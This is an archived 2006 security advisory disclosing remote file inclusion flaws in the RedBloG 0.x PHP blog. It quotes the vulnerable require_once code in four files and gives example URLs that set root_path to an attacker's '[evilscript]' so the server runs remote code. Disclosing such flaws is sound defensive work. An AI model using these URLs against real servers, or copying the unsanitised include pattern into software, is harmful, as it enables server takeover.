RedBloG 0.x Multiple Remote File Include

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14392
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

RedBloG 0.x Multiple Remote File Include

Discovered: KeyCoder

HomePage : http://keycoder.blogspot.com

Contact: keycoder[at]msn[dot]com

Greetz: SecretlyX-BeLa-BodyGuarD #


Details :

RedBloG 0.x Multiple (root_path) Remote File Include Vulnerability

Script : http://sourceforge.net/projects/redblog

Vulnerable Files: /admin/index.php,/admin/config.php,imgen.php,common.php

Risk:High

Class:Remote


Vulnerable Files Detail:


/admin/index.php

define('REDBLOG', true); $root_path='./../'; require_once($root_path . 'common.php'); require_once($root_path . 'includes/functions.php');

/admin/config.php

define('REDBLOG', true); $root_path='./../'; require_once($root_path . 'common.php'); require_once($root_path . 'includes/functions.php');

/imgen.php

define('REDBLOG', true); define('IMGEN', true); $root_path='./'; require_once($root_path . 'common.php');

/common.php

require_once($root_path . 'config.php'); require_once($root_path . 'includes/constants.php'); require_once($root_path . 'includes/template.php'); require_once($root_path . 'includes/db.php');

Examples:

http://host/Path/admin/index.php?root_path=[evilscript] http://host/Path/admin/config.php?root_path=[evilscript] http://host/Path/imgen.php?root_path=[evilscript] http://host/Path/common.php?root_path=[evilscript]

Original advisory: http://keycoder.blogspot.com/2006/09/redblog-05-multiple-remote-file.html